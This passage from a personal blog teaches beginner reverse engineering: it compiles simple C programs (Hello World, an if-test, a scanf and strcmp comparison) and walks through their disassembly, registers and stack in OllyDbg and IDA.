EDI=0012FF52, (ASCII "NickFnord")

Showing that it is now loading the string that we entered.

The call to strcmp compares the two arrays of characters, and if we step to the next command we see that it has placed a “1” into the EAX register rather than just changing the zero flag. As a result, we merely need to compare the EAX register to a hard-coded 0 in order to set the appropriate flag for jumping. Once again, in these types of comparisons, 0 means no difference and any non-zero value means a difference (strcmp returns a negative or a positive number depending on which string sorts first; here we see 1). So when a 1 is returned from the strcmp function we know that the strings are different, and since 1<>0 the zero flag is not set and the program execution jumps. Run the program through again and enter the correct string to prove it for yourself and to see it in action.

00401353  |. 68 BFB04000    PUSH hello3.0040B0BF             ; /format = "Hello World"
00401358  |. E8 24760000    CALL hello3._printf              ; \_printf
0040135D  |. 83C4 04        ADD ESP,4
00401360  |. EB 0D          JMP SHORT hello3.0040136F
00401362  |> 68 AAB04000    PUSH hello3.0040B0AA             ; /format = "No Greeting for you"
00401367  |. E8 15760000    CALL hello3._printf              ; \_printf
0040136C  |. 83C4 04        ADD ESP,4
0040136F  |> B8 00000000    MOV EAX,0
00401374  |. 5F             POP EDI
00401375  |. 5E             POP ESI
00401376  |. C9             LEAVE
00401377  \. C3             RETN

The remainder of the program is fairly straightforward – as in the previous excersise we see an if-test in action.

Once again, it may be instructive to open the program in IDA to see how it displays it.聽 I’d recommend running through the progam a couple of times in IDA also to become familiar with it in addition to Olly as they each have their advantages.

Now at this point I was going to compile this C program using another tool and see if there were any differences in the resultant binary. But after downloading Microsoft Visual C++, removing its Firefox plugin that I didn’t ask for, spending 20 minutes hunting around for the damn compile button before realising that I needed to “create a solution” before compiling, and then not being able to compile it because it didn’t recognise the strcmp function, I gave it up. Perhaps I’ll do that another time…

Once again, I hope this has been educational. Feel free to leave comments!

Nick.

Posted by: nickfnord | September 30, 2008

Binary Analysis Basics

One thing I have found over the couple of times I have dabbled in reversing is that a common learning strategy for newbies is to get straight into trying crackmes without having a basic understanding of what the hell they’re doing. Guided by poorly written “tuts” or tutorials, often sprinkled liberally with shocking spelling, the tendency is to try to glean information from seeing it done. From a random sampling of tutorials found on http://www.crackmes.de and other places, I have found that a very large portion of them do not fully explain what is going on and why the reverser chose to put the breakpoint where he/she did. For example, things like “I put a brake pnt ther becoz my spidy sense told me to lol, u will haf to figar out why 4 urself” happen surprisingly often. Alternatively, the tutorial writer doesn’t write a tutorial at all and merely posts the answer without any guidance on how to arrive at it. This is fine if you have some experience, but for a newbie it can certainly be frustrating, resulting in the newbie being able to, at best, go through the motions laid out in the tutorial without understanding what is being done. Don’t get me wrong, there are some excellent tutorials out there, written by people who care that people are reading and following along, but they are few and far between.

So in order to avoid this, the strategy that I initially started with this time around was to learn to program in assembly and then go from there. I had hoped that having a solid understanding of assembly language would assist in reversing. To my surprise, this has also caused me great frustration. The thing is, code written by a human, regardless of the language, is translated by the compiler into whatever form it judges most efficient according to the type of compiler and the optimisation options set, and there may be a trade-off between things like speed of execution, memory usage and size of the final executable. Certain mathematical operations, for example, may be switched around and handled in completely different ways than a human would logically expect, and comparisons and jumps changed accordingly, or code interleaved in order to get more efficient execution.

The end result is that the code that the CPU executes may look entirely different from the code that the human wrote. My conclusion, therefore, is that if your goal is to learn to reverse, teaching yourself to write programs in assembly language will only be useful up to a certain point.

The ultimate goal of any reversing session is to understand the program flow well enough that you could at least write pseudocode describing its functionality. This level of understanding may not be necessary in all cases, depending on your reasons for reversing, but it should still be the goal that you aim for from the start. And as you will never have the hand-written code to look at, it is more profitable to learn what certain higher level logic looks like after it has been compiled, linked and then disassembled.

So what I am doing in this post, and possibly subsequent posts, is going through, at a very basic level, the breakdown of simple instructions as viewed via a disassembler.

You will need:
————–
A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
Some familiarity with OllyDbg
Knowledge of hex

First we’ll start with the standard Hello World program.

I’m using the command line rather than the GUI of LCC because I find it more flexible to work with when just compiling small amounts of code like this.

Install LCC -> right click on “my computer” -> properties -> Advanced tab -> environment variables -> edit the “path” variable and put the directory that you have installed lcc into at the beginning of the line followed by a semicolon e.g. “C:\lcc\bin;”.
Create a file called “compile.bat” in the directory that you will be working in and put the following in it:

lcc -o %1.obj %1.c
lcclnk -o %1.exe %1.obj

Type the following C program into your chosen text editor and save it as hello.c

#include <stdio.h>
int main(void)
{
    printf("Hello World\n");
    return 0;
}

Now you can just type into the command line

compile hello

and it will create a file called hello.exe

This classic program obviously prints “Hello World” out to the screen. But for this seemingly simple task to be accomplished there is far more going on under the hood. Specifically, printf is a function from the C standard library (declared in stdio.h) which displays information on the screen. In the completed binary, the printf code is linked in statically, so it is integrated into the executable itself.

So let’s open it up in OllyDbg.

As you can see, there’s quite a bit more stuff in there apart from what we’ve written. Notice that you get placed at what Ollydbg thinks is the entry point for the program. The purpose of this example is not to go through this, but to determine what the compiler has done with our code.

Scroll down until you get to the following:

004012D4  /$ 68 A0A04000    PUSH hello.0040A0A0                      ; /format = "Hello World"
004012D9  |. E8 DB5E0000    CALL hello._printf                       ; \_printf
004012DE  |. 83C4 04        ADD ESP,4
004012E1  |. B8 00000000    MOV EAX,0
004012E6  \. C3             RETN

This section of the code pushes the address 0040A0A0, which is where the “Hello World” string is stored, onto the stack and then calls the function printf. You can see what is stored at 0040A0A0 by right-clicking on the command in OllyDbg and selecting “Follow in dump -> Immediate constant”. The string is part of the program’s data and is loaded into memory when the program is opened. You can see exactly what the _printf function does by stepping into it at runtime (set a breakpoint at that line and hit F7 to step into the code).

Next we’ll add a bit more complexity and demonstrate a few more things at once:

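#include <stdio.h>
int main(void)
{
    int num;

    if (2==2)
    {
        printf("Hello World\n");
    }
    else
    {
        printf("No Greeting for you\n\n");
    }

    printf("enter a number\n");
    scanf("%d",&num);
    if (num==2)
    {
        printf("number = 2\n");
    }
    else
    {
        printf("number <> 2\n");
    }

    /* Printing an address with %d is not portable C (%p is the proper
       specifier); it is used here so the address shows up as a plain
       decimal number that we can convert to hex by hand. */
    printf("The address of number is: %d and the value is %d",&num, num);

    return 0;
}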

So let’s compile this and open it up in Olly.

Again we’ve been placed at the entry point to the program. Scroll down until you see the following:

004012D4   $ 55             PUSH EBP
004012D5   . 89E5           MOV EBP,ESP
004012D7   . 51             PUSH ECX
004012D8   . 57             PUSH EDI
004012D9   . 68 FFB04000    PUSH hello2.0040B0FF                     ; /format = "Hello World"
004012DE   . E8 76760000    CALL hello2._printf                      ; \_printf
004012E3   . 83C4 04        ADD ESP,4
004012E6   . EB 0D          JMP SHORT hello2.004012F5
004012E8   . 68 E9B04000    PUSH hello2.0040B0E9                     ; /format = "No Greeting for you"
004012ED   . E8 67760000    CALL hello2._printf                      ; \_printf
004012F2   . 83C4 04        ADD ESP,4

You can see here that the compiler has decided that our if-test is not necessary: instead of performing a compare on 2==2, it opts to always execute the call to printf with “Hello World” and then inserts a JMP command to always skip over the “No Greeting for you” section. This is a very small, trivial example of the kinds of unexpected things that you’ll find in disassembled code. Very likely no programmer would compare two constants like we have, but you can see that the program has been optimised in a way that may not immediately make sense if we don’t have the source code handy.

004012F5   > 68 D9B04000    PUSH hello2.0040B0D9                     ; /format = "enter a number"
004012FA   . E8 5A760000    CALL hello2._printf                      ; \_printf
004012FF   . 83C4 04        ADD ESP,4
00401302   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]
00401305   . 57             PUSH EDI
00401306   . 68 D6B04000    PUSH hello2.0040B0D6                     ; /format = "%d"
0040130B   . E8 70430000    CALL hello2._scanf                       ; \_scanf
00401310   . 83C4 08        ADD ESP,8
00401313   . 837D FC 02     CMP DWORD PTR SS:[EBP-4],2

This section takes a number entered by the user and compares it. It’s worth it at this point to set a breakpoint at 004012F5 and step through the program paying close attention to the registers and the stack.

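The LEA (Load Effective Address) command calculates the address EBP-4 and stores it in EDI; it does not read the value stored at that address. The following PUSH command then puts that address onto the stack, as the argument that tells scanf where to store the number.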

You’ll notice that the number you enter is placed on the stack at 0012FF6C. Yours may be different, but it will always be at the address EBP-4; here EBP holds 0012FF70, so in hex 0012FF70 – 4 = 0012FF6C.

The stack now looks like this

0012FF60   0040B0D6  Ö°@.  ASCII "%d"
0012FF64   0012FF6C  lÿ.
0012FF68   7C910208  ‘|  ntdll.7C910208
0012FF6C   00000002  ...
0012FF70  /0012FFC0  Àÿ.

Olly moves the view of the stack according to what is in the ESP register (which was just incremented by 8 in the previous code). You can scroll up and right-click -> lock stack in order to stop it from moving while debugging.

The memory address 0012FF64 now stores the address of the location that contains the number we just entered. Something that is important to note at the moment is the difference between a reference to the data stored in a register and a reference to the data stored at the memory address that the register holds. They are very different.

For example, having stepped through the code to the CMP statement, we would have seen that the ADD ESP,8 command immediately added 8 to the value stored in the ESP register. The CMP command, however, is not referring to the data stored in EBP, nor is it referring to (the value of the data stored in EBP)-4; it is referencing the data stored at the memory address in the stack that equals the value of (EBP minus 4). Confusing?

If the data stored in EBP is “0012FF70”, then any reference to EBP without square brackets refers to the value 0012FF70.
If the data stored at the memory address 0012FF70 is “0012FFC0”, then a reference to [EBP] with the square brackets is referring to the value “0012FFC0”.
A reference to [EBP-4] first takes the number 4 away from the value stored in EBP, and then finds the value stored at the resultant memory address. In this case EBP contains the hex value “0012FF70” and so EBP-4 = “0012FF6C”. If the data stored at the 0012FF6C stack address is “2”, then a reference to [EBP-4] = “2”.

I hope this is clear because it is a very important concept, and one that may not be clear to people who have only programmed in higher level languages (like myself I’m ashamed to admit). Once again, I recommend that you step through this in Ollydbg paying close attention to the registers and the stack.

Moving right along then, the rest of the code is as follows:

00401317   . 75 0F          JNZ SHORT hello2.00401328
00401319   . 68 CAB04000    PUSH hello2.0040B0CA                     ; /format = "number = 2"
0040131E   . E8 36760000    CALL hello2._printf                      ; \_printf
00401323   . 83C4 04        ADD ESP,4
00401326   . EB 0D          JMP SHORT hello2.00401335
00401328   > 68 BDB04000    PUSH hello2.0040B0BD                     ; /format = "number <> 2"
0040132D   . E8 27760000    CALL hello2._printf                      ; \_printf
00401332   . 83C4 04        ADD ESP,4

Here you see the basics of an if-test at work. As we know, the previous command (CMP DWORD PTR SS:[EBP-4],2) effectively performed the operation [EBP-4]-2, and instead of storing the result, it set the status flags (ZF and CF among them) according to the outcome. All we care about for this one is whether the difference is zero (ZF flag set to 1). If it is, the program will carry on with the next command; if it is not zero, it will jump (JNZ = Jump if Not Zero) by setting the next execution address (stored in the EIP register) to 00401328 and then continue on.

If we enter 2 into the program, the result of the comparison will be zero and the program will proceed to tell us that the “number = 2”. After it has finished doing this, the JMP takes it to the first command after the end of the alternate branch (the PUSH at 00401335). If it takes the “number <> 2” path instead, then once it has finished it simply continues with the next command, which is that same PUSH.

If you are following closely at this point, you will notice that there are some unnecessary redundancies in this code. There is a duplicated “ADD ESP,4”; only one is ever executed due to the if-test, so why not remove one and place the other at the end of the if-test? You’ll also notice that the EDI register still contains the address EBP-4 from the earlier LEA command, and so the second LEA command in the final section is unnecessary. There are certain strange people in this world who actually care about this sort of thing, and they have competitions to try to reduce the size of executables as much as possible by removing redundancies like this and being as efficient as possible. For the moment, it’s just an interesting point to note: compilers are not absolutely perfect.

Next, we get to our final section of the code.

00401335   > FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /<%d>
00401338   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]             ; |
0040133B   . 57             PUSH EDI                                 ; |<%d>
0040133C   . 68 A0B04000    PUSH hello2.0040B0A0                     ; |format = "The address of number is: %d and the value is %d"
00401341   . E8 17760000    CALL hello2._printf                      ; \_printf
00401346   . 83C4 0C        ADD ESP,0C
00401349   . B8 00000000    MOV EAX,0
0040134E   . 5F             POP EDI
0040134F   . C9             LEAVE
00401350   . C3             RETN

I just added this section of the code to ram home the difference between data stored in registers and the value stored in the memory location stored by the registers.

The first line here is fairly simple: it gets the value that we entered and puts it at the top of the stack, preparing it for being displayed to the user. The second line calculates the address EBP-4 (the location where that value is stored) and puts it into the EDI register. The following line pushes it onto the stack and we’re ready to go.

If you take it one step further, the stack looks like this:

0012FF5C   0040B0A0  |format = "The address of number is: %d and the value is %d"
0012FF60   0012FF6C  |<%d> = 12FF6C (1245036.)
0012FF64   00000002  \<%d> = 2

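You’ll notice that the numeral 2 was placed on the stack first, followed by the memory address, despite the fact that the address is displayed first in the output string. This is because the arguments of a C function call are pushed from right to left here, so the first argument (the format string) ends up on top. You can step into the CALL hello2._printf command (by hitting F7 in Olly) to see what happens with these values.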

You’ll notice that the program, when it completes its execution, will output “The address of number is: 1245036”. If you convert this to hex, you’ll get 12FF6C, which is the memory address where our entered number is stored.

So there’s only one more thing remaining here. We’ve seen what Olly does with the code, let’s have a quick peek at what IDA has to offer:

As you can see, IDA puts together a nice graphical program flow, which makes it very easy to see where in the code the various jumps go. You’ll also notice that it appears to use a different method of disassembly, or at least it displays the disassembled code in a different manner than Olly does.

These two lines in Olly:
00401335   > FF75 FC        PUSH DWORD PTR SS:[EBP-4]                ; /<%d>
00401338   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]             ; |

are somewhat simplified in IDA as:

push [ebp+var_4]
lea  edi, [ebp+var_4]

with var_4 being defined at the start of the function as the constant -4.

I hope this has been helpful. Please feel free to leave a comment, and if I’ve made any mistakes in the above, please let me know. I’m always trying to learn more 🙂

Next time we’ll do the same thing again looking at array structures.

Cheers!
Nick.
